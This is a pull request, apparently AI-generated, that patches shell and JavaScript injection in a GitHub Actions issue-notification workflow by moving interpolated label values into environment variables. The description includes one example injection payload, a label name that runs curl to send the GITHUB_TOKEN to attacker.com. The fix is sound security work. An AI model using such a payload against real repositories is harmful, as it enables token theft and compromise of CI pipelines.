### PR TITLE
fix: patch script injection in org-issue-notifications

### DIFF
--- a/.github/workflows/org-issue-notifications.yml
+++ b/.github/workflows/org-issue-notifications.yml
@@ -15,13 +15,14 @@ jobs:
     steps:
       - name: Classify issue priority
         id: categorize
+        env:
+          LABELS: ${{ join(github.event.issue.labels.*.name, ',') }}
         run: |
-          LABELS="${{ join(github.event.issue.labels.*.name, ',') }}"
           echo "labels=${LABELS}" >> "$GITHUB_OUTPUT"
-          if echo "$LABELS" | grep -Eq "urgent|critical"; then
+          if echo "${LABELS}" | grep -Eq "urgent|critical"; then
             echo "priority=urgent" >> "$GITHUB_OUTPUT"
             echo "emoji=🚨" >> "$GITHUB_OUTPUT"
-          elif echo "$LABELS" | grep -Eq "high-priority|security"; then
+          elif echo "${LABELS}" | grep -Eq "high-priority|security"; then
             echo "priority=high" >> "$GITHUB_OUTPUT"
             echo "emoji=⚠️" >> "$GITHUB_OUTPUT"
           else
@@ -31,11 +32,14 @@ jobs:
 
       - name: Comment notification summary
         uses: actions/github-script@v7
+        env:
+          PRIORITY: ${{ steps.categorize.outputs.priority }}
+          EMOJI: ${{ steps.categorize.outputs.emoji }}
         with:
           script: |
-            const priority = '${{ steps.categorize.outputs.priority }}';
-            const emoji = '${{ steps.categorize.outputs.emoji }}';
-            const labels = '${{ steps.categorize.outputs.labels }}';
+            const priority = process.env.PRIORITY;
+            const emoji = process.env.EMOJI;
+            const labels = context.payload.issue.labels.map(l => l.name).join(',');
             const body = [
               `${emoji} **Organization-Wide Issue Alert**`,
               '',


### PR DESCRIPTION
## Summary

- **Shell injection (line 19):** `${{ join(github.event.issue.labels.*.name, ',') }}` was macro-expanded directly inside a `run:` block, allowing crafted label names to execute arbitrary shell commands. Moved to an `env:` block so the value is set by the runner as an environment variable, not interpolated into the script text.
- **JavaScript injection (lines 36-38):** `${{ steps.categorize.outputs.labels }}` was string-interpolated into a `github-script` JS block via `'${{ ... }}'`, enabling script injection through label content. Replaced with `context.payload.issue.labels` (safe API access) and `process.env.*` for step outputs.
- Normalized `$LABELS` references to `${LABELS}` for consistency.

## Vulnerability

GitHub Actions expression syntax (`${{ }}`) performs text substitution before the shell or JS interpreter runs. An attacker who can control the substituted value (e.g., by creating an issue label named `'); curl attacker.com/steal?t=$(cat $GITHUB_TOKEN) #`) can inject arbitrary commands. Moving these values to `env:` blocks or accessing them via `context.payload` eliminates the injection vector.

## Test plan

- [ ] Verify workflow YAML is valid (`actionlint` or GitHub Actions syntax check)
- [ ] Create a test issue with `org-wide` label to confirm notification still fires
- [ ] Confirm labels display correctly in the comment and step summary

🤖 Generated with [Claude Code](https://claude.com/claude-code)